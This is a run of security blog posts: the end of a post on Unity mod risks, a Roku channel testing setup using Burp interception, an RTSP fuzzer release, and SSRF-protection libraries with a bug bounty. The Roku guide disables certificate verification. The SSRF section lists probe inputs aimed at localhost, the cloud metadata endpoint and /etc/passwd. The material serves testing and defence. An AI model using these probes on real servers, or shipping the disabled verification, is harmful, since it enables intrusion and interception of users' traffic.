In general, game developers need to decide how much protection they want to add at the app layer vs. leaving the risk decision to the end-user’s own judgment about which mods to run, just as it’s on them which executables they download. That’s fair, but it might be a good idea to at least give gamers a heads up that this could be dangerous, via documentation and notifications in the UI layer. They may not expect that mods could do any harm to their computer, and might be more careful once they know.

As mentioned above, if you’d like to read more about this issue and Unity’s recommendations, be sure to check out their blog post!

The post Hacking Unity Games with Malicious GameObjects appeared first on Include Security Research Blog.

New School Hacks: Test Setup for Hacking Roku Channels Written in Brightscript

30 March 2021 at 18:00

We were recently asked by one of our clients (our day job at IncludeSec is hacking software of all types) to take a look at their Roku channel. For those unfamiliar, Roku calls apps for its platform “channels”. We haven’t seen too many Roku channel security reviews, and neither has the industry, as there isn’t much public information about setting up an environment to conduct a security assessment of a Roku channel.

The purpose of this post was to be a practical guide rather than present any new 0day, but stay tuned to the end of the post for application security tips for Roku channel developers. Additionally we did run this post by the Roku security team and we thank them for taking the time to review our preview.

Roku channels are scripted in Brightscript, a scripting language created specifically for media-heavy Roku channels that is, syntax-wise, very similar to our old 90s friend Visual Basic. A sideloaded Roku channel is just a zip file containing primarily Brightscript code, XML documents describing application components, and media assets. These channels operate within a sandbox similar to Android apps. Due to the architecture of a sandboxed custom scripting language, Roku channels’ access to Roku’s Linux-based operating system, and to other channels on the same Roku device, is limited. Channels are encrypted and signed by the developer (on Roku hardware) and distributed through Roku’s infrastructure, so users generally don’t have access to channel packages, unlike APKs on Android.

The Brightscript language as well as channel development are well documented by Roku. Roku hardware devices can be put in a developer mode by entering a cheat code sequence which enables sideloading as well as useful features such as a debugger and remote control over the network. You’ll need these features as they’ll be very useful when exploring attacks against Roku channels.

You’ll also want to use the Eclipse Brightscript plugin as it is very helpful when editing or auditing Brightscript code. If you have access to a channel’s source code you can easily import it into Eclipse by creating a new Eclipse project from the existing code, and use the plugin’s project export dialog to re-package the channel and install it to a local Roku device in development mode.

Getting Burp to Work With Brightscript

As with most embedded or mobile types of client applications, one of the first things we do when testing a new platform that interacts with the web is to get HTTP requests running through Burp Suite. It is incredibly helpful in debugging and looking for vulnerabilities to be able to intercept, inspect, modify, and replay HTTP requests to a backend API. Getting a Roku channel working through Burp involves redirecting traffic destined for the backend API to Burp instead, and disabling certificate checking on the client. Note that Roku does support client certificates, but this discussion doesn’t involve bypassing those; we’ll focus on bypassing client-side checks of server certificates for channels where the source code is available, which is the situation we have with IncludeSec’s clients.

Brightscript code that makes HTTP requests uses Brightscript’s roUrlTransfer object. For example, some code to GET example.com might look like this:

urlTransfer = CreateObject("roUrlTransfer")
urlTransfer.SetCertificatesFile("common:/certs/ca-bundle.crt")
urlTransfer.SetUrl("https://example.com/")
s = urlTransfer.GetToString()

To setup an easy intercept environment I like to use the create_ap script from https://github.com/lakinduakash/linux-wifi-hotspot to quickly and easily configure hostapd, dnsmasq, and iptables to set up a NAT-ed test network hosted by a Linux machine. There are many ways to perform the man-in-the-middle to redirect requests to Burp, but I’m using a custom hosts file in the dnsmasq configuration to redirect connections to the domains I’m interested in (in this case example.com) to my local machine, and an iptables rule to redirect incoming connections on port 443 to Burp’s listening port.


Here’s starting the WIFI AP:

# cat /tmp/test-hosts
192.168.12.1 example.com
# create_ap -e /tmp/test-hosts $AP_NETWORK_INTERFACE $INTERNET_NETWORK_INTERFACE $SSID $PASSWORD

And here’s the iptables rule:

# iptables -t nat -A PREROUTING -p tcp --src 192.168.12.0/24 --dst 192.168.12.1 --dport 443 -j REDIRECT --to-port 8085

In Burp’s Proxy -> Options tab, I’ll add the proxy listener listening on the test network ip on port 8085, configured for invisible proxying mode:


Next, we need to bypass the HTTPS certificate check that will cause the connection to fail. The easiest way to do this is to set EnablePeerVerification to false:

urlTransfer = CreateObject("roUrlTransfer")
urlTransfer.SetCertificatesFile("common:/certs/ca-bundle.crt")
urlTransfer.EnablePeerVerification(false)
urlTransfer.SetUrl("https://example.com/")
s = urlTransfer.GetToString()

Then, re-build the channel and sideload it on to a Roku device in developer mode. Alternatively we can export Burp’s CA certificate, convert it to PEM format, and include that in the modified channel.

This converts the cert from DER to PEM format:

$ openssl x509 -inform der -in burp-cert.der -out burp-cert.pem

The burp-cert.pem file needs to be added to the channel zip file, and the code below changes the certificates file from the internal Roku file to the burp pem file:

urlTransfer = CreateObject("roUrlTransfer")
urlTransfer.SetCertificatesFile("pkg:/burp-cert.pem")
urlTransfer.SetUrl("https://example.com/")
s = urlTransfer.GetToString()

It’s easy to add the certificate file to the package when exporting and sideloading using the BrightScript Eclipse plugin:


Now the request can be proxied and shows up in Burp’s history:


With that you’re off to the races inspecting and modifying traffic of your Roku channel assessment subject. All of your usual fat client/Android app techniques for intercepting and manipulating traffic apply. You can combine that with code review of the BrightScript itself to hunt for interesting security problems, and don’t discount privacy problems like unencrypted transport or over-collection of data.

For BrightScript developers who may be worried about people using these types of techniques here are our top five tips for coding secure and privacy conscious channels:

  1. Only deploy what you need in a channel, don’t deploy debug/test code.
  2. Consider that confidentiality of the file contents of your deployed channel may not be a given. Don’t hard code secret URLs, tokens, or other security-relevant info in your channel, and don’t assume an attacker will never have access to the client-side code.
  3. Don’t gather/store/send more personal information than is absolutely necessary and expected by your users.
  4. Encrypt all of your network connections to/from your channel and verify certificates. Nothing should ever be in plain text HTTP.
  5. Watch out for 3rd parties. User tracking and other personal data sent to 3rd parties can become compliance and legal nightmares; avoid this and make your business aware of the possible ramifications if they choose to use 3rd parties for tracking.

Hopefully this post has been useful as a quick start for those interested in exploring the security of Roku channels and Brightscript code. Compared to other similar platforms, Roku is relatively locked down with its own scripting language and sandboxing. Channels also don’t have much user-controllable input or a notable client-side attack surface, but channels on Roku and apps on other platforms generally have to connect to backend web services, so running those connections through Burp is a good starting point to look for security and privacy concerns.

Further research into the Roku platform itself is also on the horizon…perhaps there will be a Part 2 of this post? 🙂

The post New School Hacks: Test Setup for Hacking Roku Channels Written in Brightscript appeared first on Include Security Research Blog.

Announcing RTSPhuzz — An RTSP Server Fuzzer

15 June 2020 at 14:00

There are many ways software is tested for faults, some of those faults end up originating from exploitable memory corruption situations and are labeled vulnerabilities. One popular method used to identify these types of faults in software is runtime fuzzing.

When developing servers that implement an RFC defined protocol, dynamically mutating the inputs and messages sent to the server is a good strategy for fuzzing. The Mozilla security team has used fuzzing internally to great effect on their systems and applications over the years. One area that Mozilla wanted to see more open source work in was fuzzing of streaming media protocols, specifically RTSP.

Towards that goal IncludeSec is today releasing https://github.com/IncludeSecurity/RTSPhuzz. We’re also excited to announce the work of the initial development of the tool has been sponsored by the Mozilla Open Source Support (MOSS) awards program. RTSPhuzz is provided as free and open unsupported software for the greater good of the maintainers and authors of RTSP services — FOSS and COTS alike!

RTSPhuzz is based on the boofuzz framework; it connects as a client to target RTSP servers and fuzzes RTSP messages or sequences of messages. In the rest of this post we’ll cover some of the important bits to know about it. If you have an RTSP server, go ahead and jump right into our repo and shoot us a note to say hi if it ends up being useful to you.

Existing Approaches

We are aware of two existing RTSP fuzzers, StreamFUZZ and RtspFuzzer.

RtspFuzzer uses the Peach fuzzing framework to fuzz RTSP responses, however it targets RTSP client implementations, whereas our fuzzer targets RTSP servers.

StreamFUZZ is a Python script that does not utilize a fuzzing framework. Similar to our fuzzer, it fuzzes different parts of RTSP messages and sends them to a server. However, it is more simplistic; it doesn’t fuzz as many messages or header fields as our fuzzer, it does not account for the types of the fields it fuzzes, and it does not keep track of sessions for fuzzing sequences of messages.

Approach to Fuzzer Creation

The general approach for RTSPhuzz was to first review the RTSP RFC carefully, then define each of the client-to-server message types as boofuzz messages. RTSP headers were then distributed among the boofuzz messages in such a way that each is mutated by the boofuzz engine in at least one message, and boofuzz messages are connected in a graph to reasonably simulate RTSP sessions. Header values and message bodies were given initial reasonable default values to allow successful fuzzing of later messages in a sequence of messages. Special processing is done for several headers so that they conform to the protocol when different parts of messages are being mutated. The boofuzz fuzzing framework gives us the advantage of being able to leverage its built-in mutations, logging, and web interface.

Using RTSPhuzz

You can grab the code from github. Then, specify the server host, server port, and RTSP path to a media file on the target server:

RTSPhuzz.py --host target.server.host --port 554 --path test/media/file.mp3

Once RTSPhuzz is started, the boofuzz framework will open the default web interface on localhost port 26000, and will record results locally in a boofuzz-results/ directory. The web interface can be re-opened for the database from a previous run with boofuzz’s boo tool:

boo open <run-*.db>

See the RTSPhuzz readme for more detailed options and ways to run RTSPhuzz, and boofuzz’s documentation for more information on boofuzz.

Open Source and Continued Development

This is RTSPhuzz’s initial release for open use by all. We encourage you to try it out and share ways to improve the tool. We will review and accept PRs, address bugs where we can, and also would love to hear any shout-outs for any bugs you find with this tool (@includesecurity).

The post Announcing RTSPhuzz — An RTSP Server Fuzzer appeared first on Include Security Research Blog.

Introducing: SafeURL – A set of SSRF Protection Libraries

At Include Security, we believe that a reactive approach to security can fall short when it’s not backed by proactive roots. We see new offensive tools for pen-testing and vulnerability analysis being created and released all the time. With regard to SSRF vulnerabilities, we saw an opportunity to release code that helps developers protect against these sorts of security issues. So we’re releasing a new set of language-specific libraries to help developers effectively protect against SSRF issues. In this blog post, we’ll introduce the concept of SafeURL, with details about how it works, how developers can use it, and our plans for rewarding those who find vulnerabilities in it!

Preface: Server Side Request Forgery

Server Side Request Forgery (SSRF) is a vulnerability that gives an attacker the ability to create requests from a vulnerable server. SSRF attacks are commonly used to target not only the host server itself, but also hosts on the internal network that would normally be inaccessible due to firewalls.
SSRF allows an attacker to:

  • Scan and attack systems from the internal network that are not normally accessible
  • Enumerate and attack services that are running on these hosts
  • Exploit host-based authentication services

As is the case with many web application vulnerabilities, SSRF is possible because of a lack of user input validation. For example, a web application that accepts a URL input in order to fetch that resource from the internet can be given a valid URL such as http://google.com
But the application may also accept URLs such as:

  • http://127.0.0.1:8080/admin
  • http://169.254.169.254/latest/meta-data/
  • file:///etc/passwd

When those kinds of inputs are not validated, attackers are able to access internal resources that are not intended to be public.
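To make the gap concrete, here is a minimal sketch (the function name and payloads are ours, purely illustrative) of the kind of naive check that looks like validation but does nothing to stop SSRF — it only confirms the scheme, so internal targets sail through:

```python
from urllib.parse import urlparse

def naive_is_safe(url):
    """A hypothetical naive check: accepts any http/https URL.
    This is exactly the sort of validation that leaves SSRF open."""
    return urlparse(url).scheme in ("http", "https")

# The scheme check passes even though both targets are internal services:
print(naive_is_safe("http://127.0.0.1:8080/admin"))               # True
print(naive_is_safe("http://169.254.169.254/latest/meta-data/"))  # True
```

The check rejects file:///etc/passwd, but any internal host reachable over HTTP remains fair game — which is why validation has to look at the host and resolved address, not just the scheme.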

Our Proposed Solution

SafeURL is a library, originally conceptualized as “SafeCURL” by Jack Whitton (aka @fin1te), that protects against SSRF by validating each part of the URL against a white or black list before making the request. SafeURL can also be used to validate URLs. SafeURL intends to be a simple replacement for libcurl methods in PHP and Python as well as java.net.URLConnection in Scala.
The source for the libraries is available on our Github:

  1. SafeURL for PHP – Primarily developed by @fin1te
  2. SafeURL for Python – Ported by @nicolasrod
  3. SafeURL for Scala – Ported by @saelo
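As a conceptual illustration of that validate-each-part approach (this is our own sketch, not the actual SafeURL implementation — the function name and exception type are hypothetical), a whitelist/blacklist check over the parsed parts of a URL might look like:

```python
import re
from urllib.parse import urlparse

class SSRFValidationError(Exception):
    """Raised when a URL fails a whitelist/blacklist check."""

def check_url(url, scheme_whitelist=("http", "https"), domain_blacklist=()):
    """Validate the scheme and domain of a URL before fetching it.
    Conceptual sketch only: real libraries also check ports and IPs."""
    parts = urlparse(url)
    if parts.scheme not in scheme_whitelist:
        raise SSRFValidationError(f"scheme not whitelisted: {parts.scheme}")
    host = parts.hostname or ""
    for pattern in domain_blacklist:
        if re.fullmatch(pattern, host):
            raise SSRFValidationError(f"domain blacklisted: {host}")
    return True
```

For example, `check_url("http://example.com")` passes, while `check_url("ftp://example.com")` raises because ftp is not in the scheme whitelist. The key design point mirrored here is that validation happens before the request is made, not after.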

Other Mitigation Techniques

Our approach is focused on protection on the application layer. Other techniques used by some Silicon Valley companies to combat SSRF include:

  • Wrapping HTTP client calls so that all outbound requests are forwarded through a single-purpose proxy, with firewall rules preventing that proxy from talking to any internal hosts
  • At the application server layer, intercepting all socket connections and ensuring they meet a developer-configured policy, by enforcing iptables rules or through more advanced interactions with the app server’s networking layer
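At its core, the application-layer check comes down to resolving the target host and refusing private, loopback, and link-local addresses. A minimal Python sketch of that idea (the function name is ours, and this is a simplification, not SafeURL’s actual code):

```python
import ipaddress
import socket

def is_internal_address(host):
    """Resolve a host and report whether any resulting address is
    private, loopback, or link-local. Sketch of an application-layer
    SSRF check; a real one must also pin the resolved IP for the
    actual connection to avoid DNS-rebinding races."""
    for info in socket.getaddrinfo(host, None):
        ip = ipaddress.ip_address(info[4][0])
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            return True
    return False
```

Note the caveat in the docstring: checking the name and then letting the HTTP client resolve it again is a time-of-check/time-of-use hole, so the connection should be made to the address that was actually validated.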

Installation

PHP

SafeURL can be included in any PHP project by cloning the repository on our Github and importing it into your project.

Python

SafeURL can be used in Python apps by cloning the repository on our Github and importing it like this:

from safeurl import safeurl

Scala

To use SafeURL in Scala applications, clone the repository and store in the app/ folder of your Play application and import it.

import com.includesecurity.safeurl._

Usage

PHP

SafeURL is designed to be a drop-in replacement for the curl_exec() function in PHP. It can simply be replaced with SafeURL::execute() wrapped in a try {} catch {} block.

try {
    $url = "http://www.google.com";

    $curlHandle = curl_init();
    //Your usual cURL options
    curl_setopt($curlHandle, CURLOPT_USERAGENT, "Mozilla/5.0 (SafeURL)");

    //Execute using SafeURL
    $response = SafeURL::execute($url, $curlHandle);
} catch (Exception $e) {
    //URL wasn't safe
}

Options such as white and black lists can be modified. For example:

$options = new Options();
$options->addToList("blacklist", "domain", "(.*)\.fin1te\.net");
$options->addToList("whitelist", "scheme", "ftp");

//This will now throw an InvalidDomainException
$response = SafeURL::execute("http://www.fin1te.net", $curlHandle, $options);

//Whilst this will be allowed, and return the response
$response = SafeURL::execute("ftp://example.com", $curlHandle, $options);

Python

SafeURL serves as a replacement for PyCurl in Python.

import sys

try:
    su = safeurl.SafeURL()
    res = su.execute("https://example.com")
except:
    print("Unexpected error:", sys.exc_info())

Example of modifying options:

try:
    su = safeurl.SafeURL()

    opt = safeurl.Options()
    opt.clearList("whitelist")
    opt.clearList("blacklist")
    opt.setList("whitelist", ["google.com", "youtube.com"], "domain")

    su.setOptions(opt)
    res = su.execute("http://www.youtube.com")
except:
    print("Unexpected error:", sys.exc_info())

Scala

SafeURL replaces the JVM Class URLConnection that is normally used in Scala.

try {
  val resp = SafeURL.fetch("http://google.com")
  val r = Await.result(resp, 500 millis)
} catch {
  case e: Exception => //URL wasn't safe
}
Options:

SafeURL.defaultConfiguration.lists.ip.blacklist ::= "12.34.0.0/16"
SafeURL.defaultConfiguration.lists.domain.blacklist ::= "example.com"

Demo, Bug Bounty Contest, and Further Contributions

An important question to ask is: Is SafeURL really safe? Don’t take our word for it. Try to hack it yourself! We’re hosting live demo apps in each language for anyone to try and bypass SafeURL and perform a successful SSRF attack. On each site there is a file called key.txt on the server’s local filesystem with the following .htaccess policy:

<Files key.txt>
Order deny,allow
Deny from all
Allow from 127.0.0.1

ErrorDocument 403 /oops.html
</Files>

If you can read the contents of the file through a flaw in SafeURL and tell us how you did it (patch plz?), we will contact you about your reward. As a thank you to the community, we’re going to reward up to one Bitcoin for any security issues. If you find a non-security bug in the source of any of our libraries, please contact us as well; you’ll have our thanks and a shout-out.
The challenges are being hosted at the following URLs:
PHP: safeurl-php.excludesecurity.com
Python: safeurl-python.excludesecurity.com
Scala: safeurl-scala.excludesecurity.com

If you contribute a Pull Request porting the SafeURL concept to other languages (such as Java, Ruby, C#, etc.), we could throw you some Bitcoin as a thank you.

Good luck and thanks for helping us improve SafeURL!

The post Introducing: SafeURL – A set of SSRF Protection Libraries appeared first on Include Security Research Blog.
